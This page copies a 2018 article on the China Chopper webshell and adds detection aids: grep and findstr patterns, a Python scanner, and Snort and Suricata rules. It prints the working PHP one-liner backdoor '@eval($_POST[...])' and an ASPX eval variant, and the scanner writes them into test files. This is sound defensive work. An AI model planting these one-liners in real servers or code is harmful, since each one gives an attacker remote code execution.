
China Chopper webshell


Last updated 4 years ago


Copied from Andrea Fortuna's website:

What is the China Chopper Webshell, and how to find it on a compromised system?

March 28, 2018

Some days ago, during a chat with a friend who works in a small software development company, the topic of webshells came up.

During the migration of a production system, my friend found some suspicious .php files, which turned out to be China Chopper webshells.

A simple software upgrade turned into a cybersecurity nightmare.

What is China Chopper?

China Chopper is a 4KB Web shell first discovered in 2012.

It is widely used by Chinese and other malicious actors, including APT groups, to remotely access compromised Web servers.

The webshell consists of two parts: the client interface (caidao.exe) and a small file placed on the compromised web server.

Why is this webshell so dangerous and hard to find?

The file dropped on the compromised server is really small. For example, the PHP version (the file found by my friend) consists of a single line of code:

<?php @eval($_POST['password']);?>

Even with only limited access to the compromised host, it is very simple for an attacker to push this small piece of code into a file.

So, all the logic is delegated to the client (caidao.exe), which communicates directly with the file dropped on the web server and provides many interesting features, such as a file explorer, a database client, an interactive command shell and a "Security Scan" used to perform brute-force password guessing against authentication portals.

China Chopper can run on any web server capable of running JSP, ASP, ASPX, PHP, or CFM, on both Windows and Linux.

Because the payload is so small, the delivery mechanism can be very flexible, for example:

  • WebDAV file upload
  • JBoss jmx-console or Apache Tomcat management pages
  • Cross-site scripting (XSS)
  • SQL injection
  • Vulnerabilities in applications/services
  • File processing vulnerabilities
  • Remote file include (RFI) and local file include (LFI) vulnerabilities
  • Lateral propagation from other access

This OS and application flexibility makes this an even more dangerous Web shell.

How can I detect this webshell on my web server?

The quickest and easiest method is using regular expressions. On a Linux machine, an egrep across your web directory can help identify infected files (for the .php version; this recurses from the current directory and only looks at .php files):

egrep -r --include='*.php' -e '[<][?]php\s@eval[(]\$_POST\[.+\][)];[?][>]' .

On a Windows machine, you can search files with regular expressions using the native findstr command:

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php

and for the .aspx version:

findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
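The same two signatures as a small scanner that walks the whole web root, since egrep -r with a *.php argument only descends into directories whose names match *.php. This is an added example, not code from the article; it broadens the PHP pattern (an assumption) to also catch variants reading $_REQUEST or $_GET, and the sample web root it scans is constructed in a temporary directory.

```python
import re
import tempfile
from pathlib import Path

# Signatures adapted from the egrep/findstr patterns above. The PHP pattern is
# broadened (assumption of this example) to $_REQUEST/$_GET as well as $_POST.
SIGNATURES = {
    "php": re.compile(
        rb"<\?php\s*@eval\(\$_(?:POST|REQUEST|GET)\[.+?\]\);\s*\?>", re.I),
    "aspx": re.compile(
        rb"<%@\s*Page\s+Language=[\"']Jscript[\"']\s*%>"
        rb"<%\s*eval\(Request\.Item\[.+?\]\s*,\s*[\"']unsafe[\"']", re.I),
}
WEB_EXTS = (".php", ".aspx")


def scan_file(path: Path) -> list[str]:
    """Names of the signatures that match the file's raw bytes."""
    try:
        data = path.read_bytes()
    except OSError:
        return []
    return [name for name, rx in SIGNATURES.items() if rx.search(data)]


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Recurse through the whole tree; map each suspicious file to its hits."""
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WEB_EXTS:
            found = scan_file(p)
            if found:
                hits[p.relative_to(root).as_posix()] = found
    return hits


def demo() -> dict[str, list[str]]:
    """Constructed sample web root: the two one-liners quoted in the article
    placed among benign files, then scanned."""
    root = Path(tempfile.mkdtemp())
    (root / "uploads").mkdir()
    (root / "uploads" / "img.php").write_text("<?php @eval($_POST['password']);?>")
    (root / "login.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>')
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    return scan_webroot(root)


if __name__ == "__main__":
    for file, sigs in demo().items():
        print(f"{file}: {', '.join(sigs)}")
```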

How to detect the malicious network traffic?

You can use the Snort IDS signature published by FireEye:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"China Chopper with first Command Detected"; flow:to_server,established; content:"FromBase64String"; content:"z1"; content:"POST"; nocase; http_method; reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html; classtype:web-application-attack; sid:900000101;)
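As an added example (not from the original article or the FireEye rule), the same detection written in Suricata's sticky-buffer syntax, which confines the two content matches to the HTTP request body rather than the whole packet payload and so avoids matches on headers or unrelated data; the sid is a placeholder to replace with one from your own range.

```suricata
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"China Chopper with first Command Detected (request body)"; flow:to_server,established; http.method; content:"POST"; http.request_body; content:"FromBase64String"; content:"z1"; classtype:web-application-attack; sid:9000001; rev:1;)
```

Either rule only inspects clear-text HTTP; for HTTPS the sensor must sit behind TLS termination or be given the session keys.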

References

  • Original article: https://www.andreafortuna.org/2018/03/28/what-is-the-china-chopper-webshell-and-how-to-find-it-on-a-compromized-system/
  • Analysis of caidao.exe (Hybrid Analysis): https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100
  • http://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html
  • FireEye, Breaking Down the China Chopper Web Shell, Part I: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
  • FireEye, Breaking Down the China Chopper Web Shell, Part II: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
  • http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html